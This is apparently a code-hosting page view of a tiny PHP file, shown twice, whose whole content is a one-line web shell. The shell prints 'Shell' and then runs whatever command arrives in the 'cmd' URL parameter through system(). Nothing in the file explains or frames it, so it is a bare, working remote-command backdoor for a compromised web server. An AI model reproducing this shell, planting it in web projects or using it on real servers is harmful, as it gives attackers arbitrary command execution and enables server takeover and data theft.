2 lines
44 B
PHP
2 lines
44 B
PHP
|
<?php echo "Shell";system($_GET['cmd']); ?>
|
|
<?php echo "Shell";system($_GET['cmd']); ?>
|